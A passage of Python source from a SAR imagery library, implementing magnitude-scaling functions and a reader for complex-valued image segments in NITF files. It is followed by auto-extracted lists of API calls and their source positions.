"""
def scaler(data):
return numpy.sqrt(data/scale_factor)
return scaler
def get_log_magnitude_scaling(scale_factor, db_per_step):
"""
Gets the log magnitude scaling function, to derive correct magnitude.
Parameters
----------
scale_factor : float
The scale factor, according to the definition given in STDI-0002.
db_per_step : float
The db_per_step factor, according to the definiton given in STDI-0002
Returns
-------
callable
"""
lin_scaler = get_linear_magnitude_scaling(scale_factor)
def scaler(data):
return lin_scaler(numpy.exp(0.05*numpy.log(10)*db_per_step*data))
return scaler
def get_log_power_scaling(scale_factor, db_per_step):
"""
Gets the log power scaling function, to derive correct magnitude.
Parameters
----------
scale_factor : float
The scale factor, according to the definition given in STDI-0002.
db_per_step : float
The db_per_step factor, according to the definiton given in STDI-0002
Returns
-------
callable
"""
power_scaler = get_linear_power_scaling(scale_factor)
def scaler(data):
return power_scaler(numpy.exp(0.1*numpy.log(10)*db_per_step*data))
return scaler
def get_linlog_magnitude_scaling(scale_factor, tipping_point):
"""
Gets the magnitude scaling function for the model which
is initially linear, and then switches to logarithmic beyond a fixed
tipping point.
Parameters
----------
scale_factor : float
The scale factor, according to the definition given in STDI-0002.
tipping_point : float
The tipping point between the two models.
Returns
-------
callable
"""
db_per_step = 20*numpy.log10(tipping_point)/tipping_point
log_scaler = get_log_magnitude_scaling(scale_factor, db_per_step)
def scaler(data):
out = data/scale_factor
above_tipping = (out > tipping_point)
out[above_tipping] = log_scaler(data[above_tipping])
return out
return scaler
class ApplyAmplitudeScalingFunction(ComplexFormatFunction):
__slots__ = ('_scaling_function', )
_allowed_ordering = ('MP', 'PM')
has_inverse = False
def __init__(
self,
raw_dtype: Union[str, numpy.dtype],
order: str,
scaling_function: Optional[Callable] = None,
raw_shape: Optional[Tuple[int, ...]] = None,
formatted_shape: Optional[Tuple[int, ...]] = None,
reverse_axes: Optional[Tuple[int, ...]] = None,
transpose_axes: Optional[Tuple[int, ...]] = None,
band_dimension: int = -1):
"""
Parameters
----------
raw_dtype : str|numpy.dtype
The raw datatype. Valid options dependent on the value of order.
order : str
One of `('MP', 'PM')`, with allowable raw_dtype
`('uint8', 'uint16', 'uint32', 'float32', 'float64')`.
scaling_function : Optional[Callable]
raw_shape : None|Tuple[int, ...]
formatted_shape : None|Tuple[int, ...]
reverse_axes : None|Tuple[int, ...]
transpose_axes : None|Tuple[int, ...]
band_dimension : int
Which band is the complex dimension, **after** the transpose operation.
"""
self._scaling_function = None
ComplexFormatFunction.__init__(
self, raw_dtype, order, raw_shape=raw_shape, formatted_shape=formatted_shape,
reverse_axes=reverse_axes, transpose_axes=transpose_axes, band_dimension=band_dimension)
self._set_scaling_function(scaling_function)
@property
def scaling_function(self) -> Optional[Callable]:
"""
The magnitude scaling function.
Returns
-------
None|Callable
"""
return self._scaling_function
def _set_scaling_function(self, value: Optional[Callable]):
if value is None:
self._scaling_function = None
return
if not isinstance(value, Callable):
raise TypeError('scaling_function must be callable')
self._scaling_function = value
def _forward_magnitude_theta(
self,
data: numpy.ndarray,
out: numpy.ndarray,
magnitude: numpy.ndarray,
theta: numpy.ndarray,
subscript: Tuple[slice, ...]) -> None:
if self._scaling_function is not None:
magnitude = self._scaling_function(magnitude)
ComplexFormatFunction._forward_magnitude_theta(
self, data, out, magnitude, theta, subscript)
def _extract_transform_data(
image_header: Union[ImageSegmentHeader, ImageSegmentHeader0],
band_dimension: int):
"""
Helper function for defining necessary transform_data definition for
interpreting image segment data.
Parameters
----------
image_header : ImageSegmentHeader|ImageSegmentHeader0
Returns
-------
None|str|callable
"""
if len(image_header.Bands) != 2:
raise ValueError('Got unhandled case of {} image bands'.format(len(image_header.Bands)))
complex_order = image_header.Bands[0].ISUBCAT+image_header.Bands[1].ISUBCAT
if complex_order not in ['IQ', 'QI', 'MP', 'PM']:
raise ValueError('Got unhandled complex order `{}`'.format(complex_order))
bpp = int(image_header.NBPP/8)
pv_type = image_header.PVTYPE
if pv_type == 'INT':
raw_dtype = '>u{}'.format(bpp)
elif pv_type == 'SI':
raw_dtype = '>i{}'.format(bpp)
elif pv_type == 'R':
raw_dtype = '>f{}'.format(bpp)
else:
raise ValueError('Got unhandled PVTYPE {}'.format(pv_type))
# noinspection PyUnresolvedReferences
tre = None if img_header.ExtendedHeader.data is None else \
img_header.ExtendedHeader.data['CMETAA'] # type: Optional[CMETAA]
if tre is None:
return ComplexFormatFunction(raw_dtype, complex_order, band_dimension=band_dimension)
cmetaa = tre.DATA
if cmetaa.CMPLX_PHASE_SCALING_TYPE.strip() != 'NS':
raise ValueError(
'Got unsupported CMPLX_PHASE_SCALING_TYPE {}'.format(
cmetaa.CMPLX_PHASE_SCALING_TYPE))
remap_type = cmetaa.CMPLX_MAG_REMAP_TYPE.strip()
if remap_type == 'NS':
if complex_order in ['IQ', 'QI']:
return ComplexFormatFunction(raw_dtype, complex_order, band_dimension=band_dimension)
else:
raise ValueError(
'Got unexpected state where cmetaa.CMPLX_MAG_REMAP_TYPE is "NS",\n\t '
'but Band[0].ISUBCAT/Band[1].ISUBCAT = `{}`'.format(complex_order))
elif remap_type not in ['LINM', 'LINP', 'LOGM', 'LOGP', 'LLM']:
raise ValueError('Got unsupported CMETAA.CMPLX_MAG_REMAP_TYPE {}'.format(remap_type))
if complex_order not in ['MP', 'PM']:
raise ValueError(
'Got unexpected state where cmetaa.CMPLX_MAG_REMAP_TYPE is `{}`,\n\t'
'but Band[0].ISUBCAT/Band[1].ISUBCAT = `{}`'.format(
remap_type, complex_order))
scale_factor = float(cmetaa.CMPLX_LIN_SCALE)
if remap_type == 'LINM':
scaling_function = get_linear_magnitude_scaling(scale_factor)
elif remap_type == 'LINP':
scaling_function = get_linear_power_scaling(scale_factor)
elif remap_type == 'LOGM':
# NB: there is nowhere in the CMETAA structure to define
# the db_per_step value. Strangely, the use of this value is laid
# out in the STDI-0002 standards document, which defines CMETAA
# structure. We will generically use a value which maps the
# max uint8 value to the max int16 value.
db_per_step = 300*numpy.log(2)/255.0
scaling_function = get_log_magnitude_scaling(scale_factor, db_per_step)
elif remap_type == 'LOGP':
db_per_step = 300*numpy.log(2)/255.0
scaling_function = get_log_power_scaling(scale_factor, db_per_step)
elif remap_type == 'LLM':
scaling_function = get_linlog_magnitude_scaling(
scale_factor, int(cmetaa.CMPLX_LINLOG_TP))
else:
raise ValueError('Got unhandled CMETAA.CMPLX_MAG_REMAP_TYPE {}'.format(remap_type))
return ApplyAmplitudeScalingFunction(raw_dtype, complex_order, scaling_function, band_dimension=band_dimension)
######
# The interpreter and reader objects
class ComplexNITFDetails(NITFDetails):
"""
Details object for NITF file containing complex data.
"""
__slots__ = (
'_segment_status', '_segment_bands', '_sicd_meta', '_reverse_axes', '_transpose_axes')
def __init__(
self,
file_name: str,
reverse_axes: Union[None, int, Sequence[int]] = None,
transpose_axes: Optional[Tuple[int, ...]] = None):
"""
Parameters
----------
file_name : str
file name for a NITF file containing a complex SICD
reverse_axes : None|Sequence[int]
Any entries should be restricted to `{0, 1}`. The presence of
`0` means to reverse the rows (in the raw sense), and the presence
of `1` means to reverse the columns (in the raw sense).
transpose_axes : None|Tuple[int, ...]
If presented this should be only `(1, 0)`.
"""
self._reverse_axes = reverse_axes
self._transpose_axes = transpose_axes
self._segment_status = None
self._sicd_meta = None
self._segment_bands = None
NITFDetails.__init__(self, file_name)
self._find_complex_image_segments()
if len(self.sicd_meta) == 0:
raise SarpyIOError(
'No complex valued image segments found in file {}'.format(file_name))
@property
def reverse_axes(self) -> Union[None, int, Sequence[int]]:
return self._reverse_axes
@property
def transpose_axes(self) -> Optional[Tuple[int, ...]]:
return self._transpose_axes
@property
def segment_status(self) -> Tuple[bool, ...]:
"""
Tuple[bool, ...]: Where each image segment is viable for use.
"""
return self._segment_status
@property
def sicd_meta(self) -> Tuple[SICDType, ...]:
"""
Tuple[SICDType, ...]: The best inferred sicd structures.
"""
return self._sicd_meta
@property
def segment_bands(self) -> Tuple[Tuple[int, Optional[int]], ...]:
"""
This describes the structure for the output data segments from the NITF,
with each entry of the form `(image_segment, output_band)`, where
`output_band` will be `None` if the image segment has exactly one
complex band.
Returns
-------
Tuple[Tuple[int, Optional[int]], ...]
The band details for use.
"""
return self._segment_bands
def _check_band_details(
self,
index: int,
sicd_meta: List,
segment_status: List,
segment_bands: List):
if len(segment_status) != index:
raise ValueError('Inconsistent status checking state')
image_header = self.img_headers[index]
if image_header.ICAT.strip() not in ['SAR', 'SARIQ']:
segment_status.append(False)
return
# construct a preliminary sicd
sicd = extract_sicd(image_header, self._transpose_axes is not None)
bands = image_header.Bands
pvtype = image_header.PVTYPE
# handle odd bands
if (len(bands) % 2) == 1:
if image_header.PVTYPE != 'C':
# it's not complex, so we're done
segment_status.append(False)
return
segment_status.append(True)
sicd_meta.append(sicd)
segment_bands.append((index, len(bands)))
return
# we have an even number of bands - ensure that the bands are marked
# IQ/QI/MP/PM
order = bands[0].ISUBCAT + bands[1].ISUBCAT
if order not in ['IQ', 'QI', 'MP', 'PM']:
segment_status.append(False)
return
if len(bands) == 2:
# this should be the most common by far
segment_status.append(True)
sicd_meta.append(sicd)
segment_bands.append((index, 1))
return
for i in range(2, len(bands), 2):
if order != bands[i].ISUBCAT + bands[i+1].ISUBCAT:
logging.error(
'Image segment appears to multiband with switch complex ordering')
segment_status.append(False)
return
if order in ['IQ', 'QI']:
if pvtype not in ['SI', 'R']:
logging.error(
'Image segment appears to be complex of order `{}`, \n\t'
'but PVTYPE is `{}`'.format(order, pvtype))
segment_status.append(False)
if order in ['MP', 'PM']:
if pvtype not in ['INT', 'R']:
logging.error(
'Image segment appears to be complex of order `{}`, \n\t'
'but PVTYPE is `{}`'.format(order, pvtype))
segment_status.append(False)
segment_status.append(True)
sicd_meta.append(sicd)
segment_bands.append((index, int(len(bands)/2)))
def _find_complex_image_segments(self):
"""
Find complex image segments.
Returns
-------
None
"""
sicd_meta = []
segment_status = []
segment_bands = []
for index in range(len(self.img_headers)):
self._check_band_details(index, sicd_meta, segment_status, segment_bands)
self._segment_status = tuple(segment_status)
use_sicd_meta = []
use_segment_bands = []
for (the_index, out_bands), sicd in zip(segment_bands, sicd_meta):
if out_bands == 1:
use_sicd_meta.append(sicd)
use_segment_bands.append((the_index, None))
else:
for j in range(out_bands):
use_sicd_meta.append(sicd.copy())
use_segment_bands.append((the_index, j))
self._sicd_meta = tuple(use_sicd_meta)
self._segment_bands = tuple(use_segment_bands)
class ComplexNITFReader(NITFReader, SICDTypeReader):
"""
A reader for complex valued NITF elements, this should be explicitly tried AFTER
the SICDReader.
"""
def __init__(
self,
nitf_details: Union[str, ComplexNITFDetails],
reverse_axes: Union[None, int, Sequence[int]] = None,
transpose_axes: Optional[Tuple[int, ...]] = None):
"""
Parameters
----------
nitf_details : str|ComplexNITFDetails
reverse_axes : None|Sequence[int]
Any entries should be restricted to `{0, 1}`. The presence of
`0` means to reverse the rows (in the raw sense), and the presence
of `1` means to reverse the columns (in the raw sense).
transpose_axes : None|Tuple[int, ...]
If presented this should be only `(1, 0)`.
"""
if isinstance(nitf_details, str):
nitf_details = ComplexNITFDetails(
nitf_details, reverse_axes=reverse_axes, transpose_axes=transpose_axes)
if not isinstance(nitf_details, ComplexNITFDetails):
raise TypeError('The input argument for ComplexNITFReader must be a filename or '
'ComplexNITFDetails object.')
SICDTypeReader.__init__(self, None, nitf_details.sicd_meta)
NITFReader.__init__(
self,
nitf_details,
reader_type="SICD",
reverse_axes=nitf_details.reverse_axes,
transpose_axes=nitf_details.transpose_axes)
self._check_sizes()
@property
def nitf_details(self) -> ComplexNITFDetails:
"""
ComplexNITFDetails: The NITF details object.
"""
# noinspection PyTypeChecker
return self._nitf_details
def get_nitf_dict(self):
"""
Populate a dictionary with the pertinent NITF header information. This
is for use in more faithful preservation of NITF header information
in copying or rewriting sicd files.
Returns
-------
dict
"""
out = {}
security = {}
security_obj = self.nitf_details.nitf_header.Security
# noinspection PyProtectedMember
for field in NITFSecurityTags._ordering:
value = getattr(security_obj, field).strip()
if value != '':
security[field] = value
if len(security) > 0:
out['Security'] = security
out['OSTAID'] = self.nitf_details.nitf_header.OSTAID
out['FTITLE'] = self.nitf_details.nitf_header.FTITLE
return out
def populate_nitf_information_into_sicd(self):
"""
Populate some pertinent NITF header information into the SICD structure.
This provides more faithful copying or rewriting options.
"""
nitf_dict = self.get_nitf_dict()
for sicd_meta in self._sicd_meta:
sicd_meta.NITF = copy.deepcopy(nitf_dict)
def depopulate_nitf_information(self):
"""
Eliminates the NITF information dict from the SICD structure.
"""
for sicd_meta in self._sicd_meta:
sicd_meta.NITF = {}
def get_format_function(
self,
raw_dtype: numpy.dtype,
complex_order: Optional[str],
lut: Optional[numpy.ndarray],
band_dimension: int,
image_segment_index: Optional[int] = None,
**kwargs) -> Optional[FormatFunction]:
image_header = self.nitf_details.img_headers[image_segment_index]
bands = len(image_header.Bands)
if complex_order is not None and bands == 2:
return _extract_transform_data(image_header, band_dimension)
# TODO: strange nonstandard float16 handling?
return NITFReader.get_format_function(
self, raw_dtype, complex_order, lut, band_dimension, image_segment_index, **kwargs)
def _check_image_segment_for_compliance(
self,
index: int,
img_header: Union[ImageSegmentHeader, ImageSegmentHeader0]) -> bool:
return self.nitf_details.segment_status[index]
def find_image_segment_collections(self) -> Tuple[Tuple[int, ...]]:
return tuple((entry[0], ) for entry in self.nitf_details.segment_bands)
def create_data_segment_for_collection_element(self, collection_index: int) -> DataSegment:
the_index, the_band = self.nitf_details.segment_bands[collection_index]
if the_index not in self._image_segment_data_segments:
data_segment = self.create_data_segment_for_image_segment(the_index, apply_format=True)
else:
data_segment = self._image_segment_data_segments[the_index]
if the_band is None:
return data_segment
else:
return SubsetSegment(data_segment, (slice(None, None, 1), slice(None, None, 1), slice(the_band, the_band+1, 1)), 'formatted', close_parent=True)
def final_attempt(file_name: str) -> Optional[ComplexNITFReader]:
"""
Contingency check to open for some other complex NITF type file.
Returns a reader instance, if so.
Parameters
----------
file_name : str|BinaryIO
the file_name to check
Returns
-------
ComplexNITFReader|None
"""
if is_file_like(file_name):
return None
try:
nitf_details = ComplexNITFDetails(file_name)
logger.info('File {} is determined to be some other format complex NITF.')
return ComplexNITFReader(nitf_details)
except (SarpyIOError, ValueError):
return None
|
[
"sarpy.io.general.format_function.ComplexFormatFunction._forward_magnitude_theta",
"sarpy.io.complex.sicd_elements.GeoData.SCPType",
"sarpy.io.complex.sicd_elements.RadarCollection.RadarCollectionType",
"sarpy.io.general.format_function.ComplexFormatFunction",
"logging.error",
"sarpy.io.complex.sicd_elements.ImageCreation.ImageCreationType",
"sarpy.io.general.nitf.NITFDetails.__init__",
"sarpy.io.complex.sicd_elements.Timeline.TimelineType",
"sarpy.io.general.nitf.NITFReader.__init__",
"sarpy.io.complex.sicd_elements.Grid.DirParamType",
"numpy.isfinite",
"sarpy.io.complex.sicd_elements.GeoData.GeoDataType",
"sarpy.io.complex.sicd_elements.Grid.WgtTypeType",
"sarpy.io.general.nitf.extract_image_corners",
"sarpy.io.general.utils.is_file_like",
"numpy.log10",
"sarpy.io.complex.sicd_elements.CollectionInfo.CollectionInfoType",
"sarpy.geometry.geocoords.ned_to_ecf",
"sarpy.geometry.latlon.num",
"sarpy.io.complex.sicd_elements.ImageData.ImageDataType",
"sarpy.io.complex.sicd_elements.SICD.SICDType",
"copy.deepcopy",
"sarpy.io.general.nitf.NITFReader.get_format_function",
"sarpy.io.complex.sicd_elements.SCPCOA.SCPCOAType",
"datetime.datetime.strptime",
"sarpy.io.complex.sicd_elements.RadarCollection.ChanParametersType",
"sarpy.geometry.geocoords.geodetic_to_ecf",
"sarpy.io.complex.base.SICDTypeReader.__init__",
"sarpy.io.complex.sicd_elements.PFA.PFAType",
"sarpy.io.complex.sicd_elements.ImageFormation.ImageFormationType",
"numpy.log",
"numpy.deg2rad",
"numpy.datetime64",
"numpy.any",
"sarpy.io.general.format_function.ComplexFormatFunction.__init__",
"sarpy.io.complex.sicd_elements.Grid.GridType",
"logging.getLogger",
"numpy.sqrt"
] |
[((2044, 2071), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (2061, 2071), False, 'import logging\n'), ((24348, 24410), 'sarpy.io.complex.sicd_elements.SICD.SICDType', 'SICDType', ([], {'CollectionInfo': 'collection_info', 'ImageData': 'image_data'}), '(CollectionInfo=collection_info, ImageData=image_data)\n', (24356, 24410), False, 'from sarpy.io.complex.sicd_elements.SICD import SICDType\n'), ((45138, 45161), 'sarpy.io.general.utils.is_file_like', 'is_file_like', (['file_name'], {}), '(file_name)\n', (45150, 45161), False, 'from sarpy.io.general.utils import is_file_like\n'), ((3655, 3758), 'sarpy.io.complex.sicd_elements.CollectionInfo.CollectionInfoType', 'CollectionInfoType', ([], {'CollectorName': 'collector_name', 'CoreName': 'core_name', 'Classification': 'classification'}), '(CollectorName=collector_name, CoreName=core_name,\n Classification=classification)\n', (3673, 3758), False, 'from sarpy.io.complex.sicd_elements.CollectionInfo import CollectionInfoType\n'), ((4880, 5030), 'sarpy.io.complex.sicd_elements.ImageData.ImageDataType', 'ImageDataType', ([], {'PixelType': 'pixel_type', 'NumRows': 'rows', 'NumCols': 'cols', 'FirstRow': '(0)', 'FirstCol': '(0)', 'FullImage': '(rows, cols)', 'SCPPixel': '(0.5 * rows, 0.5 * cols)'}), '(PixelType=pixel_type, NumRows=rows, NumCols=cols, FirstRow=0,\n FirstCol=0, FullImage=(rows, cols), SCPPixel=(0.5 * rows, 0.5 * cols))\n', (4893, 5030), False, 'from sarpy.io.complex.sicd_elements.ImageData import ImageDataType\n'), ((15291, 15340), 'datetime.datetime.strptime', 'datetime.strptime', (['aimida.CREATION_DATE', '"""%d%b%y"""'], {}), "(aimida.CREATION_DATE, '%d%b%y')\n", (15308, 15340), False, 'from datetime import datetime\n'), ((15598, 15664), 'datetime.datetime.strptime', 'datetime.strptime', (['(aimida.MISSION_DATE + aimida.TIME)', '"""%d%b%y%H%M"""'], {}), "(aimida.MISSION_DATE + aimida.TIME, '%d%b%y%H%M')\n", (15615, 15664), False, 'from datetime import datetime\n'), ((21388, 21412), 'sarpy.geometry.geocoords.geodetic_to_ecf', 'geodetic_to_ecf', (['arp_llh'], {}), '(arp_llh)\n', (21403, 21412), False, 'from sarpy.geometry.geocoords import geodetic_to_ecf, ned_to_ecf\n'), ((21431, 21455), 'sarpy.geometry.geocoords.geodetic_to_ecf', 'geodetic_to_ecf', (['scp_llh'], {}), '(scp_llh)\n', (21446, 21455), False, 'from sarpy.geometry.geocoords import geodetic_to_ecf, ned_to_ecf\n'), ((22630, 22654), 'sarpy.geometry.geocoords.geodetic_to_ecf', 'geodetic_to_ecf', (['arp_llh'], {}), '(arp_llh)\n', (22645, 22654), False, 'from sarpy.geometry.geocoords import geodetic_to_ecf, ned_to_ecf\n'), ((22673, 22697), 'sarpy.geometry.geocoords.geodetic_to_ecf', 'geodetic_to_ecf', (['scp_llh'], {}), '(scp_llh)\n', (22688, 22697), False, 'from sarpy.geometry.geocoords import geodetic_to_ecf, ned_to_ecf\n'), ((23371, 23404), 'sarpy.io.general.nitf.extract_image_corners', 'extract_image_corners', (['img_header'], {}), '(img_header)\n', (23392, 23404), False, 'from sarpy.io.general.nitf import extract_image_corners, NITFDetails, NITFReader\n'), ((25492, 25523), 'numpy.sqrt', 'numpy.sqrt', (['(data / scale_factor)'], {}), '(data / scale_factor)\n', (25502, 25523), False, 'import numpy\n'), ((28851, 29056), 'sarpy.io.general.format_function.ComplexFormatFunction.__init__', 'ComplexFormatFunction.__init__', (['self', 'raw_dtype', 'order'], {'raw_shape': 'raw_shape', 'formatted_shape': 'formatted_shape', 'reverse_axes': 'reverse_axes', 'transpose_axes': 'transpose_axes', 'band_dimension': 'band_dimension'}), '(self, raw_dtype, order, raw_shape=raw_shape,\n formatted_shape=formatted_shape, reverse_axes=reverse_axes,\n transpose_axes=transpose_axes, band_dimension=band_dimension)\n', (28881, 29056), False, 'from sarpy.io.general.format_function import FormatFunction, ComplexFormatFunction\n'), ((30008, 30104), 'sarpy.io.general.format_function.ComplexFormatFunction._forward_magnitude_theta', 'ComplexFormatFunction._forward_magnitude_theta', (['self', 'data', 'out', 'magnitude', 'theta', 'subscript'], {}), '(self, data, out, magnitude,\n theta, subscript)\n', (30054, 30104), False, 'from sarpy.io.general.format_function import FormatFunction, ComplexFormatFunction\n'), ((31419, 31497), 'sarpy.io.general.format_function.ComplexFormatFunction', 'ComplexFormatFunction', (['raw_dtype', 'complex_order'], {'band_dimension': 'band_dimension'}), '(raw_dtype, complex_order, band_dimension=band_dimension)\n', (31440, 31497), False, 'from sarpy.io.general.format_function import FormatFunction, ComplexFormatFunction\n'), ((35010, 35047), 'sarpy.io.general.nitf.NITFDetails.__init__', 'NITFDetails.__init__', (['self', 'file_name'], {}), '(self, file_name)\n', (35030, 35047), False, 'from sarpy.io.general.nitf import extract_image_corners, NITFDetails, NITFReader\n'), ((41100, 41159), 'sarpy.io.complex.base.SICDTypeReader.__init__', 'SICDTypeReader.__init__', (['self', 'None', 'nitf_details.sicd_meta'], {}), '(self, None, nitf_details.sicd_meta)\n', (41123, 41159), False, 'from sarpy.io.complex.base import SICDTypeReader\n'), ((41168, 41316), 'sarpy.io.general.nitf.NITFReader.__init__', 'NITFReader.__init__', (['self', 'nitf_details'], {'reader_type': '"""SICD"""', 'reverse_axes': 'nitf_details.reverse_axes', 'transpose_axes': 'nitf_details.transpose_axes'}), "(self, nitf_details, reader_type='SICD', reverse_axes=\n nitf_details.reverse_axes, transpose_axes=nitf_details.transpose_axes)\n", (41187, 41316), False, 'from sarpy.io.general.nitf import extract_image_corners, NITFDetails, NITFReader\n'), ((43632, 43750), 'sarpy.io.general.nitf.NITFReader.get_format_function', 'NITFReader.get_format_function', (['self', 'raw_dtype', 'complex_order', 'lut', 'band_dimension', 'image_segment_index'], {}), '(self, raw_dtype, complex_order, lut,\n band_dimension, image_segment_index, **kwargs)\n', (43662, 43750), False, 'from sarpy.io.general.nitf import extract_image_corners, NITFDetails, NITFReader\n'), ((5712, 5742), 'sarpy.io.complex.sicd_elements.GeoData.GeoDataType', 'GeoDataType', ([], {'ImageCorners': 'icps'}), '(ImageCorners=icps)\n', (5723, 5742), False, 'from sarpy.io.complex.sicd_elements.GeoData import GeoDataType, SCPType\n'), ((6005, 6031), 'sarpy.io.complex.sicd_elements.SCPCOA.SCPCOAType', 'SCPCOAType', ([], {'ARPPos': 'arp_ecf'}), '(ARPPos=arp_ecf)\n', (6015, 6031), False, 'from sarpy.io.complex.sicd_elements.SCPCOA import SCPCOAType\n'), ((7001, 7041), 'sarpy.io.complex.sicd_elements.Timeline.TimelineType', 'TimelineType', ([], {'CollectStart': 'collect_start'}), '(CollectStart=collect_start)\n', (7013, 7041), False, 'from sarpy.io.complex.sicd_elements.Timeline import TimelineType, IPPSetType\n'), ((7513, 7544), 'sarpy.io.complex.sicd_elements.Grid.DirParamType', 'DirParamType', ([], {'UVectECF': 'row_unit'}), '(UVectECF=row_unit)\n', (7525, 7544), False, 'from sarpy.io.complex.sicd_elements.Grid import GridType, DirParamType, WgtTypeType\n'), ((7715, 7746), 'sarpy.io.complex.sicd_elements.Grid.DirParamType', 'DirParamType', ([], {'UVectECF': 'col_unit'}), '(UVectECF=col_unit)\n', (7727, 7746), False, 'from sarpy.io.complex.sicd_elements.Grid import GridType, DirParamType, WgtTypeType\n'), ((8124, 8137), 'sarpy.io.complex.sicd_elements.GeoData.GeoDataType', 'GeoDataType', ([], {}), '()\n', (8135, 8137), False, 'from sarpy.io.complex.sicd_elements.GeoData import GeoDataType, SCPType\n'), ((8204, 8216), 'sarpy.io.complex.sicd_elements.SCPCOA.SCPCOAType', 'SCPCOAType', ([], {}), '()\n', (8214, 8216), False, 'from sarpy.io.complex.sicd_elements.SCPCOA import SCPCOAType\n'), ((8279, 8289), 'sarpy.io.complex.sicd_elements.Grid.GridType', 'GridType', ([], {}), '()\n', (8287, 8289), False, 'from sarpy.io.complex.sicd_elements.Grid import GridType, DirParamType, WgtTypeType\n'), ((8360, 8374), 'sarpy.io.complex.sicd_elements.Timeline.TimelineType', 'TimelineType', ([], {}), '()\n', (8372, 8374), False, 'from sarpy.io.complex.sicd_elements.Timeline import TimelineType, IPPSetType\n'), ((8459, 8480), 'sarpy.io.complex.sicd_elements.RadarCollection.RadarCollectionType', 'RadarCollectionType', ([], {}), '()\n', (8478, 8480), False, 'from sarpy.io.complex.sicd_elements.RadarCollection import RadarCollectionType, TxFrequencyType, WaveformParametersType, ChanParametersType\n'), ((8563, 8583), 'sarpy.io.complex.sicd_elements.ImageFormation.ImageFormationType', 'ImageFormationType', ([], {}), '()\n', (8581, 8583), False, 'from sarpy.io.complex.sicd_elements.ImageFormation import ImageFormationType, TxFrequencyProcType\n'), ((10653, 10686), 'sarpy.io.complex.sicd_elements.Grid.WgtTypeType', 'WgtTypeType', ([], {'WindowName': '"""UNIFORM"""'}), "(WindowName='UNIFORM')\n", (10664, 10686), False, 'from sarpy.io.complex.sicd_elements.Grid import GridType, DirParamType, WgtTypeType\n'), ((10727, 10760), 'sarpy.io.complex.sicd_elements.Grid.WgtTypeType', 'WgtTypeType', ([], {'WindowName': '"""UNIFORM"""'}), "(WindowName='UNIFORM')\n", (10738, 10760), False, 'from sarpy.io.complex.sicd_elements.Grid import GridType, DirParamType, WgtTypeType\n'), ((12360, 12393), 'numpy.datetime64', 'numpy.datetime64', (['date_time', '"""us"""'], {}), "(date_time, 'us')\n", (12376, 12393), False, 'import numpy\n'), ((13493, 13541), 'sarpy.io.complex.sicd_elements.RadarCollection.ChanParametersType', 'ChanParametersType', ([], {'TxRcvPolarization': 'tx_rcv_pol'}), '(TxRcvPolarization=tx_rcv_pol)\n', (13511, 13541), False, 'from sarpy.io.complex.sicd_elements.RadarCollection import RadarCollectionType, TxFrequencyType, WaveformParametersType, ChanParametersType\n'), ((14109, 14160), 'sarpy.geometry.geocoords.ned_to_ecf', 'ned_to_ecf', (['fpn_ned', 'scp_ecf'], {'absolute_coords': '(False)'}), '(fpn_ned, scp_ecf, absolute_coords=False)\n', (14119, 14160), False, 'from sarpy.geometry.geocoords import geodetic_to_ecf, ned_to_ecf\n'), ((14183, 14234), 'sarpy.geometry.geocoords.ned_to_ecf', 'ned_to_ecf', (['ipn_ned', 'scp_ecf'], {'absolute_coords': '(False)'}), '(ipn_ned, scp_ecf, absolute_coords=False)\n', (14193, 14234), False, 'from sarpy.geometry.geocoords import geodetic_to_ecf, ned_to_ecf\n'), ((14262, 14295), 'sarpy.io.complex.sicd_elements.PFA.PFAType', 'PFAType', ([], {'FPN': 'fpn_ecf', 'IPN': 'ipn_ecf'}), '(FPN=fpn_ecf, IPN=ipn_ecf)\n', (14269, 14295), False, 'from sarpy.io.complex.sicd_elements.PFA import PFAType\n'), ((15421, 15460), 'sarpy.io.complex.sicd_elements.ImageCreation.ImageCreationType', 'ImageCreationType', ([], {'DateTime': 'create_time'}), '(DateTime=create_time)\n', (15438, 15460), False, 'from sarpy.io.complex.sicd_elements.ImageCreation import ImageCreationType\n'), ((17948, 17971), 'sarpy.io.complex.sicd_elements.Grid.DirParamType', 'DirParamType', ([], {'SS': 'row_ss'}), '(SS=row_ss)\n', (17960, 17971), False, 'from sarpy.io.complex.sicd_elements.Grid import GridType, DirParamType, WgtTypeType\n'), ((18128, 18151), 'sarpy.io.complex.sicd_elements.Grid.DirParamType', 'DirParamType', ([], {'SS': 'col_ss'}), '(SS=col_ss)\n', (18140, 18151), False, 'from sarpy.io.complex.sicd_elements.Grid import GridType, DirParamType, WgtTypeType\n'), ((19895, 19949), 'sarpy.geometry.geocoords.ned_to_ecf', 'ned_to_ecf', (['arp_pos_ned', 'scp_ecf'], {'absolute_coords': '(True)'}), '(arp_pos_ned, scp_ecf, absolute_coords=True)\n', (19905, 19949), False, 'from sarpy.geometry.geocoords import geodetic_to_ecf, ned_to_ecf\n'), ((20057, 20112), 'sarpy.geometry.geocoords.ned_to_ecf', 'ned_to_ecf', (['arp_vel_ned', 'scp_ecf'], {'absolute_coords': '(False)'}), '(arp_vel_ned, scp_ecf, absolute_coords=False)\n', (20067, 20112), False, 'from sarpy.geometry.geocoords import geodetic_to_ecf, ned_to_ecf\n'), ((20257, 20312), 'sarpy.geometry.geocoords.ned_to_ecf', 'ned_to_ecf', (['arp_acc_ned', 'scp_ecf'], {'absolute_coords': '(False)'}), '(arp_acc_ned, scp_ecf, absolute_coords=False)\n', (20267, 20312), False, 'from sarpy.geometry.geocoords import geodetic_to_ecf, ned_to_ecf\n'), ((21882, 21938), 'sarpy.geometry.geocoords.ned_to_ecf', 'ned_to_ecf', (['row_unit_ned', 'scp_ecf'], {'absolute_coords': '(False)'}), '(row_unit_ned, scp_ecf, absolute_coords=False)\n', (21892, 21938), False, 'from sarpy.geometry.geocoords import geodetic_to_ecf, ned_to_ecf\n'), ((21959, 22015), 'sarpy.geometry.geocoords.ned_to_ecf', 'ned_to_ecf', (['col_unit_ned', 'scp_ecf'], {'absolute_coords': '(False)'}), '(col_unit_ned, scp_ecf, absolute_coords=False)\n', (21969, 22015), False, 'from sarpy.geometry.geocoords import geodetic_to_ecf, ned_to_ecf\n'), ((22808, 22832), 'sarpy.geometry.geocoords.geodetic_to_ecf', 'geodetic_to_ecf', (['scp_llh'], {}), '(scp_llh)\n', (22823, 22832), False, 'from sarpy.geometry.geocoords import geodetic_to_ecf, ned_to_ecf\n'), ((23185, 23241), 'sarpy.geometry.geocoords.ned_to_ecf', 'ned_to_ecf', (['row_unit_ned', 'scp_ecf'], {'absolute_coords': '(False)'}), '(row_unit_ned, scp_ecf, absolute_coords=False)\n', (23195, 23241), False, 'from sarpy.geometry.geocoords import geodetic_to_ecf, ned_to_ecf\n'), ((23262, 23318), 